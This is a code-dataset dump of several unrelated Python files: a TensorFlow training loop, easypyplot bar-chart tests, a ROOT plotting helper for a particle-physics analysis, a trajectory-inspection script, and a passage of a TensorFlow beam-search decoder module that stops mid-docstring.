        if step % flags.valid_iteration == 0:
            # validation
            valid_timer.tik()
            valid_logger.clear()
            for i in range(len(valid_dataset) // flags.batch_size):
                batch_data_list = valid_dataset[i * flags.batch_size : (i + 1) * flags.batch_size]
                batch_image_data = np.zeros((flags.batch_size, 32, 32, 3), dtype = np.float32)
                batch_label_data = np.zeros((flags.batch_size, 10), dtype = np.float32)
                # NOTE(review): the inner loop reuses `i`, shadowing the outer
                # batch index — harmless because the outer range iterator is
                # unaffected, but worth renaming.
                for i, (image, label) in enumerate(batch_data_list):
                    batch_image_data[i] = image.astype(np.float32)
                    batch_label_data[i] = label.astype(np.float32)
                _feed_dict = {
                    test_image_var : batch_image_data,
                    test_label_var : batch_label_data,
                }
                accuracy = sess.run(test_accuracy_op, feed_dict = _feed_dict)
                valid_logger.update([accuracy])
            [valid_accuracy] = valid_logger.get_data()
            # Checkpoint whenever validation accuracy matches or beats the best so far.
            if best_valid_accuracy <= valid_accuracy:
                best_valid_accuracy = valid_accuracy
                saver.save(sess, ckpt_format.format(step))
            valid_log_func(valid_logger.get_data())
            log_string = valid_logger.log()
            log_string = '[i] step={} '.format(step) + log_string
            log_string += 'best_valid_accuracy={:02.2f}% valid_sec={}sec'.format(best_valid_accuracy, valid_timer.tok())
            log_func(log_string)
            # test
            test_timer.tik()
            test_logger.clear()
            for i in range(len(test_dataset) // flags.batch_size):
                batch_data_list = test_dataset[i * flags.batch_size : (i + 1) * flags.batch_size]
                batch_image_data = np.zeros((flags.batch_size, 32, 32, 3), dtype = np.float32)
                batch_label_data = np.zeros((flags.batch_size, 10), dtype = np.float32)
                for i, (image, label) in enumerate(batch_data_list):
                    batch_image_data[i] = image.astype(np.float32)
                    batch_label_data[i] = label.astype(np.float32)
                _feed_dict = {
                    test_image_var : batch_image_data,
                    test_label_var : batch_label_data,
                }
                accuracy = sess.run(test_accuracy_op, feed_dict = _feed_dict)
                test_logger.update([accuracy])
            [test_accuracy] = test_logger.get_data()
            # NOTE(review): valid and test both save to ckpt_format.format(step),
            # so a best-test save can overwrite the best-valid checkpoint for the
            # same step — confirm this is intended.
            if best_test_accuracy <= test_accuracy:
                best_test_accuracy = test_accuracy
                saver.save(sess, ckpt_format.format(step))
            test_log_func(test_logger.get_data())
            log_string = test_logger.log()
            log_string = '[i] step={} '.format(step) + log_string
            log_string += 'best_test_accuracy={:02.2f}% test_sec={}sec'.format(best_test_accuracy, test_timer.tok())
            log_func(log_string)
    saver.save(sess, ckpt_format.format('end'))
| [
"josanghyeokn@gmail.com"
] | josanghyeokn@gmail.com |
6d6fd631a84409110e6ebdbb70e519217620e0ec | 1618286b6996f70d1884ed7f063ceaca7a9ec028 | /Week1-Implementation/venv/Lib/site-packages/easypyplot/tests/test_barchart.py | bc22ad88c4ce8bcc1ad9395598872add30408c80 | [] | no_license | alu-rwa-dsa/week-1-list-complexity-code_masters_marthely_luckyjohn | 610e4a3b697f4d848c790c7faaa8a3e2be466648 | 709ab56d2efe72ab0eefbd227d15bd325d59178e | refs/heads/main | 2023-02-23T21:56:09.811829 | 2021-02-02T17:59:16 | 2021-02-02T17:59:16 | 335,334,885 | 0 | 0 | null | 2021-02-02T15:29:23 | 2021-02-02T15:29:17 | null | UTF-8 | Python | false | false | 9,402 | py | """ $lic$
Copyright (c) 2016-2019, Mingyu Gao
All rights reserved.
This program is free software: you can redistribute it and/or modify it under
the terms of the Modified BSD-3 License as published by the Open Source
Initiative.
This program is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE. See the BSD-3 License for more details.
You should have received a copy of the Modified BSD-3 License along with this
program. If not, see <https://opensource.org/licenses/BSD-3-Clause>.
"""
import unittest
import numpy as np
from matplotlib import pyplot as plt
from easypyplot import barchart
from . import image_comparison
from . import setup, teardown
def _data():
return [[1, 3], [2, 4], [3.5, 1.5]]
@image_comparison(baseline_images=['barchart_base'],
remove_text=False)
def test_barchart_base():
''' bar chart base. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data())
@image_comparison(baseline_images=['barchart_nparray'],
remove_text=False)
def test_barchart_nparray():
''' bar chart with data np.array. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, np.array(_data()))
@image_comparison(baseline_images=['barchart_hdls'],
remove_text=False)
def test_barchart_hdls():
''' bar chart handlers. '''
fig = plt.figure()
ax = fig.gca()
hdls = barchart.draw(ax, _data())
ax.legend(hdls, ['E1', 'E2'])
@image_comparison(baseline_images=['barchart_group_names'],
remove_text=False)
def test_barchart_group_names():
''' bar chart group names. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), group_names=['Aa', 'Bb', '$Cc$'])
@image_comparison(baseline_images=['barchart_entry_names'],
remove_text=False)
def test_barchart_entry_names():
''' bar chart entry names. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), entry_names=['x', '$x^2$'])
@image_comparison(baseline_images=['barchart_nobkdn'],
remove_text=False)
def test_barchart_nobkdn():
''' bar chart without breakdown. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), breakdown=False)
@image_comparison(baseline_images=['barchart_width'],
remove_text=False)
def test_barchart_width():
''' bar chart width. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), width=0.5)
@image_comparison(baseline_images=['barchart_width_nobkdn'],
remove_text=False)
def test_barchart_width_nobkdn():
''' bar chart width without breakdown. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), width=0.5, breakdown=False)
@image_comparison(baseline_images=['barchart_cbshrk'],
remove_text=False)
def test_barchart_cbshrk():
''' bar chart cluster_bar_shrink. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), cluster_bar_shrink=0.5)
@image_comparison(baseline_images=['barchart_cbshrk_nobkdn'],
remove_text=False)
def test_barchart_cbshrk_nobkdn():
''' bar chart cluster_bar_shrink without breakdown. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), cluster_bar_shrink=0.5, breakdown=False)
@image_comparison(baseline_images=['barchart_xticks'],
remove_text=False)
def test_barchart_xticks():
''' bar chart xticks. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), xticks=[0, 2, 3])
@image_comparison(baseline_images=['barchart_xticks_nobkdn'],
remove_text=False)
def test_barchart_xticks_nobkdn():
''' bar chart xticks without breakdown. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), xticks=[0, 2, 3], breakdown=False)
@image_comparison(baseline_images=['barchart_colors'])
def test_barchart_colors():
''' bar chart colors. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), colors=['r', 'b'])
@image_comparison(baseline_images=['barchart_colors_nobkdn'])
def test_barchart_colors_nobkdn():
''' bar chart colors without breakdown. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), colors=['r', 'b'], breakdown=False)
@image_comparison(baseline_images=['barchart_edgecolor'])
def test_barchart_edgecolor():
''' bar chart edgecolor. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), edgecolor='y')
@image_comparison(baseline_images=['barchart_edgecolor_none'])
def test_barchart_edgecolor_none():
''' bar chart edgecolor. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), edgecolor=None)
@image_comparison(baseline_images=['barchart_hatchs'])
def test_barchart_hatchs():
''' bar chart hatchs. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), hatchs=['/', '//'])
@image_comparison(baseline_images=['barchart_linewidth'])
def test_barchart_linewidth():
''' bar chart linewidth. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), linewidth=5.0)
@image_comparison(baseline_images=['barchart_hatchcolor'])
def test_barchart_hatchcolor():
''' bar chart hatchcolor. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), hatchcolor='r', hatchs=['/', '//'])
@image_comparison(baseline_images=['barchart_legend_opts'],
remove_text=False)
def test_barchart_legend_opts():
''' bar chart legend options. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), legendloc='lower center', legendncol=2,
entry_names=['X', 'Y'])
@image_comparison(baseline_images=['barchart_yaxis_log'],
remove_text=False)
def test_barchart_yaxis_log():
''' bar chart yaxis log. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), log=True)
@image_comparison(baseline_images=['barchart_xticklabelfontsize'],
remove_text=False)
def test_barchart_xtlfontsize():
''' bar chart xticklabel fontsize. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), xticklabelfontsize=20,
group_names=['a', 'b', 'c'])
@image_comparison(baseline_images=['barchart_xticklabelrotation'],
remove_text=False)
def test_barchart_xtlrotation():
''' bar chart xticklabelrotation. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), xticklabelrotation=60,
group_names=['a', 'b', 'c'])
class TestBarchart(unittest.TestCase):
''' Tests for barchart module. '''
def setUp(self):
self.origs = setup()
self.axes = plt.figure().gca()
def tearDown(self):
teardown(self.origs)
def test_return_num_handlers(self):
''' Returned number of handlers. '''
hdls = barchart.draw(self.axes, _data())
self.assertEqual(len(hdls), len(_data()[0]))
def test_invalid_data(self):
''' Invalid data. '''
with self.assertRaisesRegexp(ValueError, r'\[barchart\] .*array.*'):
barchart.draw(self.axes, [[1, 2], [1, 2, 3]])
def test_invalid_data_dim(self):
''' Invalid data dimension. '''
for d in [0, 1, 3, 4]:
with self.assertRaisesRegexp(ValueError, r'\[barchart\] .*dim.*'):
barchart.draw(self.axes, np.zeros([3] * d))
def test_invalid_group_names(self):
''' Invalid group names. '''
with self.assertRaisesRegexp(ValueError,
r'\[barchart\] .*group names.*'):
barchart.draw(self.axes, _data(), group_names=['a', 'b', 'c', 'd'])
def test_invalid_entry_names(self):
''' Invalid entry names. '''
with self.assertRaisesRegexp(ValueError,
r'\[barchart\] .*entry names.*'):
barchart.draw(self.axes, _data(), entry_names=['x', 'y', 'z'])
def test_invalid_cluster_bar_shrink(self):
''' Invalid cluster_bar_shrink. '''
with self.assertRaisesRegexp(ValueError,
r'\[barchart\] .*cluster_bar_shrink.*'):
barchart.draw(self.axes, _data(), breakdown=False,
cluster_bar_shrink=1.2)
def test_invalid_xticks(self):
''' Invalid xticks. '''
with self.assertRaisesRegexp(ValueError, r'\[barchart\] .*xticks.*'):
barchart.draw(self.axes, _data(), xticks=['x'])
def test_not_enough_def_colors(self):
''' Not enough default colors. '''
with self.assertRaisesRegexp(ValueError,
r'\[barchart\] .*default colors.*'):
barchart.draw(self.axes, [[1] * 100])
def test_invalid_colors(self):
''' Invalid colors. '''
with self.assertRaisesRegexp(ValueError, r'\[barchart\] .*colors.*'):
barchart.draw(self.axes, _data(), colors=['k'])
def test_invalid_hatchs(self):
''' Invalid hatchs. '''
with self.assertRaisesRegexp(ValueError, r'\[barchart\] .*hatchs.*'):
barchart.draw(self.axes, _data(), hatchs=['/', '//', 'xx'])
| [
"n.marthely@alustudent.com"
] | n.marthely@alustudent.com |
844e23da7322d2935b6f935d9e3649d6e5a8c6db | abf4a37e5763d5212119bdf0bedb766a456c1780 | /util/plothelper.py | d919faa5e909c8518e4ebbc4abd78237a8c93cbf | [] | no_license | kdipetri/SUEP_scouting | 739e5d93c2d7f08d0678859d89996e9b1b53132d | ff2de840da19b6e6eafa02605a1504820ed3386f | refs/heads/main | 2023-07-27T23:28:53.352037 | 2021-09-09T17:42:27 | 2021-09-09T17:42:27 | 394,385,624 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,008 | py | import ROOT
# Module-level registries: histograms created by plot1D/plot2D, keyed by name.
hists1D = {}
hists2D = {}
# Output directory and which file formats draw1D/draw2D emit.
plotdir = "plots/hists"
doPng=True
doPdf=False
doC=False
lumi=135000 #ipb (integrated luminosity used to normalize sample weights)
# Custom palette registered with ROOT under color indices 2001-2010.
one = ROOT.TColor(2001,143/255.,45 /255.,86/255.,"darkPurple")#quinacridone magenta
two = ROOT.TColor(2002,119/255.,104/255.,174/255.,"blahBlue")#blue-violet
three = ROOT.TColor(2003,239/255.,71 /255.,111/255.,"pinkRed")#paradise pink
four = ROOT.TColor(2004,247/255.,178/255.,103/255.,"orange")#orange
five = ROOT.TColor(2005,42 /255.,157/255.,143/255.,"PersianGreen")# persian green
six = ROOT.TColor(2006,38 /255.,70 /255.,83 /255.,"Charcol")# charcol
seven = ROOT.TColor(2007,116/255.,165/255.,127/255.,"Green")#forest green
eight = ROOT.TColor(2008,233/255.,196/255.,106/255.,"Maize")# maize
nine = ROOT.TColor(2009,8/255.,103/255.,136/255.,"RussianViolet")#russian violet
ten = ROOT.TColor(2010,231/255.,111/255.,81 /255.,"TerraCotta")# terra cotta
# Preferred drawing order of the palette indices.
colors = [] #[2001,2002,2003,2004,2005,2006,2007,2008,2009,2010]
colors.append(2003)#paradise
colors.append(2004)#orange
colors.append(2005)#persian green
colors.append(2002)#blue-violet
colors.append(2001)#quinacridone magenta
colors.append(2010)#terra cotta
colors.append(2008)#maize
colors.append(2007)#forest green
colors.append(2009)#bluesapphire
colors.append(2006)#charcol
def setStyle():
    """Apply the project-wide ROOT plotting style (batch mode, fonts, margins)."""
    ROOT.gROOT.SetBatch(ROOT.kTRUE)  # no interactive canvases
    style = ROOT.gStyle
    # No stat/fit boxes on plots.
    style.SetOptStat(0)
    style.SetOptFit(0)
    # Axis label and title fonts/sizes (font 42 = Helvetica).
    style.SetLabelFont(42, "xyz")
    style.SetLabelSize(0.05, "xyz")
    style.SetTitleFont(42, "xyz")
    style.SetTitleFont(42, "t")
    style.SetTitleSize(0.06, "xyz")
    style.SetTitleSize(0.06, "t")
    # Pad margins, grid and ticks.
    style.SetPadBottomMargin(0.14)
    style.SetPadLeftMargin(0.14)
    style.SetPadGridX(0)
    style.SetPadGridY(0)
    style.SetPadTickX(1)
    style.SetPadTickY(1)
    style.SetTitleOffset(1, 'y')
    style.SetLegendTextSize(0.04)
    style.SetGridStyle(3)
    style.SetGridColor(14)
    # Marker/line defaults.
    style.SetMarkerSize(1.0)        # large markers
    style.SetHistLineWidth(2)       # bold lines
    style.SetLineStyleString(2, "[12 12]")  # postscript dashes
    return
def plot1D(name, title, x, nbinsx, xmin, xmax, weight=1.):
    """Fill the 1D histogram `name` with (x, weight), creating it on first use.

    Histograms are cached in the module-level `hists1D` registry and detached
    from any ROOT directory so they survive file closes.
    """
    hist = hists1D.get(name)
    if hist is None:
        hist = ROOT.TH1F(name, title, nbinsx, xmin, xmax)
        hist.SetDirectory(0)
        hists1D[name] = hist
    hist.Fill(x, weight)
    return
def plot2D(name, title, x, y, nbinsx, xmin, xmax, nbinsy, ymin, ymax, weight=1.):
    """Fill the 2D histogram `name` with (x, y, weight), creating it on first use.

    Histograms are cached in the module-level `hists2D` registry and detached
    from any ROOT directory.
    """
    if name in hists2D:
        # fill
        hists2D[name].Fill(x, y, weight)
    else:
        # create and fill
        hist = ROOT.TH2F(name, title, nbinsx, xmin, xmax, nbinsy, ymin, ymax)
        hist.SetDirectory(0)
        # BUG FIX: the original called hist.Fill(x, weight) here, which for a
        # TH2F is interpreted as Fill(x, y) — the first entry of every new
        # histogram landed at the wrong coordinate with the wrong weight.
        hist.Fill(x, y, weight)
        hists2D[name] = hist
    return
def draw1D(c1, h, drawopt="hist"):
    """Draw histogram h on canvas c1, save enabled formats, and Write() it."""
    c1.cd()
    c1.Clear()
    h.Draw(drawopt)
    # Emit one file per enabled output format.
    for enabled, ext in ((doPng, "png"), (doPdf, "pdf"), (doC, "C")):
        if enabled:
            c1.Print("{}/{}.{}".format(plotdir, h.GetName(), ext))
    h.Write()
    return
def draw2D(c2, h, drawopt="COLZ"):
    """Draw 2D histogram h on canvas c2, save enabled formats, and Write() it."""
    c2.cd()
    c2.Clear()
    # Wider margins so axis titles and the z-axis palette are not clipped.
    c2.SetTopMargin(0.05)
    c2.SetLeftMargin(0.2)
    c2.SetBottomMargin(0.2)
    c2.SetRightMargin(0.2)
    h.Draw(drawopt)
    # Emit one file per enabled output format.
    for enabled, ext in ((doPng, "png"), (doPdf, "pdf"), (doC, "C")):
        if enabled:
            c2.Print("{}/{}.{}".format(plotdir, h.GetName(), ext))
    h.Write()
    return
def drawAll1D(c1, drawopt="hist"):
    """Draw and save every histogram registered in hists1D."""
    for hist in hists1D.values():
        draw1D(c1, hist, drawopt)
    return
def drawAll2D(c2, drawopt="hist"):
    """Draw and save every histogram registered in hists2D."""
    for hist in hists2D.values():
        draw2D(c2, hist, drawopt)
    return
def get1D(sample, dist):
    """Fetch the histogram `<sample>_<dist>` from output/<sample>.root.

    QCD samples are delegated to getQCD() (summed HT slices); signal samples
    are scaled by sig_xs(). Returns the detached histogram, or 0 if the file
    or histogram is missing.
    """
    if "QCD" in sample:
        hist = getQCD(dist)
    else:
        filename = "output/{}.root".format(sample)
        f = ROOT.TFile.Open(filename)
        # Guard against a missing/unreadable file (TFile.Open returns null).
        if not f:
            return 0
        histname = "{}_{}".format(sample, dist)
        hist = f.Get(histname)
        # BUG FIX: scale only after confirming the histogram exists — the
        # original called hist.Scale() on the (possibly null) Get() result
        # before the existence check, crashing on missing histograms.
        if hist:
            hist.Scale(sig_xs(sample))
    if hist:
        hist.SetDirectory(0)
        return hist
    return 0
def sig_xs(sample):
    """Return the signal event weight: xs [pb] / n_generated * lumi.

    The sample name is matched by mediator-mass substring; unmatched samples
    get weight 1.
    """
    # (mass tag, xs / number of generated events)
    weights = (
        ("125", 34.8 / 100000),
        ("200", 13.6 / 500000),
        ("300", 8.9 / 500000),
        ("400", 5.9 / 100000),
        ("750", 0.5 / 100000),
        ("1000", 0.17 / 100000),
    )
    for tag, per_event in weights:
        if tag in sample:
            return per_event * lumi
    return 1.
def qcd_xs(sample):
    """Return the QCD HT-slice event weight: xs [pb] / n_events * lumi.

    Matches the HT-bin tag by substring; unknown samples fall back to 1.
    """
    if "QCD_HT200to300" in sample : return 1559000 / 100000 * lumi
    if "QCD_HT300to500" in sample : return 347700 / 100000 * lumi #311900 - was missing k-factor
    if "QCD_HT500to700" in sample : return 32100 / 100000 * lumi #29070 - was missing k-factor
    if "QCD_HT700to1000" in sample : return 6831 / 100000 * lumi #5962 - was missing k-factor
    if "QCD_HT1000to1500" in sample : return 1207 / 100000 * lumi
    if "QCD_HT1500to2000" in sample : return 119.9 / 7242 * lumi # * 100000./7242. # missing some events
    if "QCD_HT2000toInf" in sample : return 25.24 / 45606 * lumi # * 100000./45606. # missing some events
    # BUG FIX: the original implicitly returned None for unmatched samples,
    # which crashes h.Scale() in getQCD(); return a neutral weight instead,
    # consistent with sig_xs().
    return 1.
def getQCD(dist):
    """Sum the `dist` histogram over all QCD HT slices, each weighted by qcd_xs.

    Slices whose file or histogram is missing are skipped. Returns the summed,
    detached histogram named "QCD_<dist>", or 0 if no slice contributed.
    """
    ht_slices = (
        "QCD_HT200to300",
        "QCD_HT300to500",
        "QCD_HT500to700",
        "QCD_HT700to1000",
        "QCD_HT1000to1500",
        "QCD_HT1500to2000",
        "QCD_HT2000toInf",
    )
    contributions = []
    for ht_slice in ht_slices:
        f = ROOT.TFile.Open("output/{}.root".format(ht_slice))
        if not f:
            continue
        h = f.Get("{}_{}".format(ht_slice, dist))
        if not h:
            continue
        # Scale to xs * lumi / total generated events for this slice.
        h.Scale(qcd_xs(ht_slice))
        h.SetDirectory(0)
        contributions.append(h)
    if not contributions:
        return 0
    total = contributions[0].Clone("QCD_" + dist)
    for h in contributions[1:]:
        total.Add(h)
    total.SetDirectory(0)
    return total
| [
"kdipetrillo@gmail.com"
] | kdipetrillo@gmail.com |
211752c4f07d02d49629acc90f61bcdae83eb752 | 2dd3521d7eac776d498be33a9c5f24e13240f971 | /code/testing.py | c649a43bc084b67ff3ee7990ac7dd0d03ccb73d5 | [] | no_license | AlejandrodeMiguel96/MSc-thesis-on-progress | bcb25cc16a2fc77dec6fc60237bdfc72481f362c | 5c504c668d8435979d1a4fbd45cebf5416f61534 | refs/heads/main | 2023-07-10T01:07:33.634536 | 2021-08-11T00:14:03 | 2021-08-11T00:14:03 | 377,937,889 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,815 | py | import numpy as np
import matplotlib.pyplot as plt
import statistics
import time
import data_inspection

# Ad-hoc inspection script for a saved leg database: rebuilds one leg from its
# stored inputs/outputs, sanity-checks every stored delta-v against the allowed
# bounds, computes summary statistics, then plots all chaser trajectories.
# NOTE(review): `np` is used below and relies on `import numpy as np` at the
# very top of the original file.

# Previously-used databases, kept for reference:
# data = np.load('database_consistency.npz', allow_pickle=True)
# data = np.load('database_consistency_300_10examples.npz', allow_pickle=True)
# data = np.load('database_consistency_1000_60examples.npz', allow_pickle=True)
# data = np.load('database_consistency_10000_17examples.npz', allow_pickle=True)
# data = np.load('database_consistency_1000_1339examples.npz', allow_pickle=True)
# data = np.load('database_consistency_5000_60examples.npz', allow_pickle=True)
data = np.load('database_consistency_100_960examples.npz', allow_pickle=True)
database = data['database']

# Rebuild one stored leg twice from its raw inputs/outputs and compare the
# resulting scores against the stored one (consistency check).
leg1 = database[40]
from data_initial_conditions import state0_ifo
from compare_legs import build_leg
state0_chaser = state0_ifo
inputs = [*leg1.w_vec[0, :], *leg1.q_vec[0, :]]
outputs = [*leg1.dv, leg1.t_leg]
built_leg = build_leg(inputs, outputs, state0_chaser)
built_leg2 = build_leg(inputs, outputs, state0_chaser)
a = leg1.score
b = built_leg.score
c = built_leg2.score

# Collect scores and (dvx, dvy, dvz, t_leg) rows; warn if any stored delta-v
# magnitude is outside [deltav_min, deltav_max] (exactly zero is allowed).
scores = []
dv_and_t = []
for s in database:
    scores.append(s.score)
    dv_and_t.append((*s.dv, s.t_leg))
    dv_norm = np.linalg.norm(s.dv)
    if not (data_inspection.deltav_min <= dv_norm <= data_inspection.deltav_max or dv_norm == 0):
        print('error dv!!!', dv_norm)
scores = np.array(scores)
scores_sorted = np.array(sorted(scores, reverse=True))
dv_and_t = np.array(dv_and_t)

# Mean / variance / standard deviation for the score, each delta-v component,
# and the leg duration.
avrg_score = statistics.mean(scores)
var_score = statistics.variance(scores, avrg_score)
std_score = statistics.stdev(scores, avrg_score)
avrg_dvx = statistics.mean(dv_and_t[:, 0])
var_dvx = statistics.variance(dv_and_t[:, 0], avrg_dvx)
std_dvx = statistics.stdev(dv_and_t[:, 0], avrg_dvx)
avrg_dvy = statistics.mean(dv_and_t[:, 1])
var_dvy = statistics.variance(dv_and_t[:, 1], avrg_dvy)
std_dvy = statistics.stdev(dv_and_t[:, 1], avrg_dvy)
avrg_dvz = statistics.mean(dv_and_t[:, 2])
var_dvz = statistics.variance(dv_and_t[:, 2], avrg_dvz)
std_dvz = statistics.stdev(dv_and_t[:, 2], avrg_dvz)
avrg_t_leg = statistics.mean(dv_and_t[:, 3])
var_t_leg = statistics.variance(dv_and_t[:, 3], avrg_t_leg)
std_t_leg = statistics.stdev(dv_and_t[:, 3], avrg_t_leg)

# # PLOTS
# 3-D plot of every chaser trajectory in the target LVLH frame, with start
# (green star) and end (red star) markers per leg.
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.set_xlabel('v-bar [km]')
ax.set_ylabel('b-bar [km]')
ax.set_zlabel('h-bar [km]')
ax.set_title('Chaser wrt target')
plt.grid()
for s in database[:]:
    print(s.score)
    ax.plot(s.rr_chaser_LVLH[:, 0], s.rr_chaser_LVLH[:, 1], s.rr_chaser_LVLH[:, 2])
    ax.plot(s.rr_chaser_LVLH[0, 0], s.rr_chaser_LVLH[0, 1], s.rr_chaser_LVLH[0, 2], 'g*', label='starting point')
    ax.plot(s.rr_chaser_LVLH[-1, 0], s.rr_chaser_LVLH[-1, 1], s.rr_chaser_LVLH[-1, 2], 'r*', label='ending point')
a = 0
plt.show()
print('sacabo')
| [
"noreply@github.com"
] | noreply@github.com |
699217857bdbf1f709123b843e8bbc301dfeee0a | a859aadea24af173a175c2d01910314487ec6fbf | /common/ops_rnn_v2.py | acd3ae1ce052c94ce4a70df353ea57d9d33f42f4 | [
"BSD-3-Clause"
] | permissive | jiahuei/tf-sparse-captioning | cc52cbef5590b47727ea89f265011c9ab58aebad | 9d7b8ecdd44fb1541500ca4f920d6c94fd15bad1 | refs/heads/main | 2023-04-07T05:27:28.395758 | 2021-04-19T11:27:28 | 2021-04-19T11:27:28 | 359,341,665 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 34,951 | py | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 27 16:22:42 2017
@author: jiahuei
"""
# import numpy as np
import logging
import tensorflow as tf
# from tensorflow.python.framework import ops
# from tensorflow.python.ops import rnn_cell_impl
from tensorflow.contrib.seq2seq.python.ops.beam_search_decoder import _check_batch_beam, gather_tree_from_array
from tensorflow.contrib.seq2seq.python.ops import attention_wrapper
from tensorflow.python.layers.core import Dense
# from tensorflow.python.layers import base
# from tensorflow.python.framework import dtypes
# from common.mask_prune import sampler
from common.mask_prune import masked_layer
from common.ops_v1 import layer_norm_activate, dprint
from common.ops_v1 import shape as _shape
# from packaging import version
# Short alias for the seq2seq attention-wrapper state tuple used in this module.
AttentionWrapperState = tf.contrib.seq2seq.AttentionWrapperState
logger = logging.getLogger(__name__)
# Module-wide switch enabling the `_dprint` trace output below.
_DEBUG = False
def _dprint(string):
    """Forward *string* to the shared debug printer, gated on this module's _DEBUG flag."""
    printed = dprint(string, _DEBUG)
    return printed
def _layer_norm_tanh(tensor):
    """Apply layer normalisation followed by tanh over the last axis of *tensor*.

    Newer TF builds accept the `begin_norm_axis` keyword; on older builds the
    call raises TypeError, and we fall back to flattening the tensor to rank 2,
    normalising, then restoring the original shape.
    """
    # if version.parse(tf.__version__) >= version.parse('1.9'):
    try:
        tensor = layer_norm_activate(
            'LN_tanh',
            tensor,
            tf.nn.tanh,
            begin_norm_axis=-1)
    except TypeError:
        # Older API: normalise a rank-2 view and reshape back.
        tensor_s = _shape(tensor)
        tensor = layer_norm_activate(
            'LN_tanh',
            tf.reshape(tensor, [-1, tensor_s[-1]]),
            tf.nn.tanh)
        tensor = tf.reshape(tensor, tensor_s)
    return tensor
###############################################################################
def rnn_decoder_beam_search(cell,
                            embedding_fn,
                            output_layer,
                            batch_size,
                            beam_size,
                            length_penalty_weight,
                            maximum_iterations,
                            start_id,
                            end_id,
                            swap_memory=True):
    """
    Dynamic RNN loop function for inference. Performs beam search.
    Operates in time-major mode.

    Args:
        cell: An `RNNCell` instance (with or without attention).
        embedding_fn: Either embedding Variable or embedding function.
        output_layer: An instance of `tf.layers.Layer`, i.e.,
            `tf.layers.Dense`. Layer to apply to the RNN output prior to
            storing the result or sampling. Pass `None` to disable it.
        batch_size: Int scalar. Size of batch.
        beam_size: Int scalar. Size of beam for beam search.
        length_penalty_weight: Float weight to penalise length.
            Disabled with 0.0.
        maximum_iterations: Int scalar. Maximum number of decoding steps.
        start_id: `int32` scalar, the token that marks start of decoding.
        end_id: `int32` scalar, the token that marks end of decoding.
        swap_memory: Python bool, whether GPU-CPU memory swap is enabled.
            Argument passed to `tf.while_loop`.

    Returns:
        predicted_ids: int tensor shaped (time, batch_size, beam_size).
        scores: log-softmax scores shaped (time, batch_size, beam_size).
        cell_state: the `cell_state` field of the final
            `BeamSearchDecoderState`.
    """
    logger.debug('Building subgraph V4 for Beam Search.')

    # State is allocated for batch_size * beam_size; the attention memory must
    # have been tiled `beam_size` times by the caller accordingly.
    state_init = cell.zero_state(batch_size * beam_size, tf.float32)
    start_ids = tf.tile([start_id], multiples=[batch_size])
    _dprint('rnn_decoder_beam_search: Initial state: {}'.format(state_init))
    _dprint('rnn_decoder_beam_search: Cell state size: {}'.format(cell.state_size))

    # Custom subclass relaxes a TensorArray shape check (see class below).
    # decoder = tf.contrib.seq2seq.BeamSearchDecoder(
    decoder = BeamSearchDecoderMultiHead(
        cell=cell,
        embedding=embedding_fn,
        start_tokens=start_ids,
        end_token=end_id,
        initial_state=state_init,
        beam_width=beam_size,
        output_layer=output_layer,
        length_penalty_weight=length_penalty_weight,
        reorder_tensor_arrays=True)  # r1.9 API
    dec_outputs, dec_states, _ = tf.contrib.seq2seq.dynamic_decode(
        decoder=decoder,
        output_time_major=True,
        impute_finished=False,
        maximum_iterations=maximum_iterations,
        parallel_iterations=1,
        swap_memory=swap_memory)
    _dprint('rnn_decoder_beam_search: Final BeamSearchDecoderState: {}'.format(dec_states))

    # `dec_outputs` will be a `FinalBeamSearchDecoderOutput` object
    # `dec_states` will be a `BeamSearchDecoderState` object
    predicted_ids = dec_outputs.predicted_ids  # (time, batch_size, beam_size)
    scores = dec_outputs.beam_search_decoder_output.scores  # (time, batch_size, beam_size)
    # top_sequence = predicted_ids[:, :, 0]
    # top_score = scores[:, :, 0]  # log-softmax scores
    return predicted_ids, scores, dec_states.cell_state
def rnn_decoder_search(cell,
                       embedding_fn,
                       output_layer,
                       batch_size,
                       maximum_iterations,
                       start_id,
                       end_id,
                       swap_memory=True,
                       greedy_search=True):
    """
    Dynamic RNN loop function for inference. Performs greedy search / sampling.
    Operates in time-major mode.

    Args:
        cell: An `RNNCell` instance (with or without attention).
        embedding_fn: A callable that takes a vector tensor of `ids`
            (argmax ids), or the `params` argument for `embedding_lookup`.
            The returned tensor will be passed to the decoder input.
        output_layer: An instance of `tf.layers.Layer`, i.e.,
            `tf.layers.Dense`. Layer to apply to the RNN output prior to
            storing the result or sampling. Pass `None` to disable it.
        batch_size: Int scalar. Size of batch.
        maximum_iterations: Int scalar. Maximum number of decoding steps.
        start_id: `int32` scalar, the token that marks start of decoding.
        end_id: `int32` scalar, the token that marks end of decoding.
